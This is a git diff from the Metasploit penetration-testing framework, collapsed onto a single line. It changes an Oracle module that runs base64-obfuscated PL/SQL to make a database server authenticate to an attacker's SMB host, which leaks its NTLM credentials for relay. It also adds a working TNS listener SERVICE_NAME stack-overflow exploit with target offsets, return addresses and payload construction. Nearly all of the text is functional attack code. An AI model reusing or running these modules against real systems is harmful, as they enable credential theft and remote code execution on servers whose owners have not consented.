diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index b6713b0c89..c28f158df9 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -1,80 +1,82 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Owning Windows server using Oracle database unpivileged user', - 'Description' => %q{ - This module will help you to get Administrator access to OS using unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges) - To do this you must firstly run smb_sniffer of smb_relay module on your sever. Then you must connect to - Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS. - So if smb_relay is working you will get Administrators access to server which runs Oracle of not than you can decrypt HALFLM hash. - }, - 'Author' => [ 'Sh2kerr ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision:$', - 'References' => - [ - - [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ], - - ], - 'DisclosureDate' => 'April 7 2009')) - - register_options( - [ - OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - - ], self.class) - end - - def run - name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))" - prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)" - - exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')" - - prp = Rex::Text.encode_base64(prepare) - prp1 = Rex::Text.encode_base64(prepare1) - exp1 = Rex::Text.encode_base64(exploiting1) - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - #{rand3} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); - EXECUTE IMMEDIATE #{rand1}; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}'))); - EXECUTE IMMEDIATE #{rand2}; - #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}'))); - EXECUTE IMMEDIATE #{rand3}; - END; - / - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - - end - -end +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Owning Windows server using Oracle database unpivileged user.', + 'Description' => %q{ + This module will help you to get Administrator access to OS using unprivileged + Oracle database user (you need only CONNECT and RESOURCE privileges) + To do this you must firstly run smb_sniffer of smb_relay module on your sever. + Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb + which will connect to your SMB sever with credentials of Oracle RDBMS. + So if smb_relay is working you will get Administrators access to server which runs + Oracle of not than you can decrypt HALFLM hash. + }, + 'Author' => [ 'Sh2kerr ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ], + ], + 'DisclosureDate' => 'Apr 7 2009')) + + register_options( + [ + OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]), + ], self.class) + end + + def run + + name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))" + prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)" + + exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')" + + prp = Rex::Text.encode_base64(prepare) + prp1 = Rex::Text.encode_base64(prepare1) + exp1 = Rex::Text.encode_base64(exploiting1) + + sql = %Q| + DECLARE + #{rand1} VARCHAR2(32767); + #{rand2} VARCHAR2(32767); + #{rand3} VARCHAR2(32767); + BEGIN + #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); + EXECUTE IMMEDIATE #{rand1}; + #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}'))); + EXECUTE IMMEDIATE #{rand2}; + #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}'))); + EXECUTE IMMEDIATE #{rand3}; + END; + | + + begin + print_status("Executing #{self.name}...") + prepare_exec(sql) + rescue => e + return + end + + end + +end diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb new file mode 100644 index 0000000000..34b1d9d04a --- /dev/null +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -0,0 +1,95 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::TNS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.', + 'Description' => %q{ + This module exploits a stack overflow in Oracle. When + sending a specially crafted packet containing a long SERVICE_NAME + to the TNS service, an attacker may be able to execute arbitrary code. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'BID', '4845'], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ], + [ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 600, + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)', { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ], + [ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)', { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] , + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 27 2002')) + + register_options([Opt::RPORT(1521)], self.class) + + end + + def check + connect + + version = "(CONNECT_DATA=(COMMAND=VERSION))" + + pkt = tns_packet(version) + + sock.put(pkt) + + sock.get_once + + res = sock.get_once(-1, 1) + + disconnect + + if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + connect + + buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded + buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') + buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400) + + sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))" + + pkt = tns_packet(sploit) + + print_status("Trying target #{target.name}...") + sock.put(pkt) + + handler + + disconnect + end + +end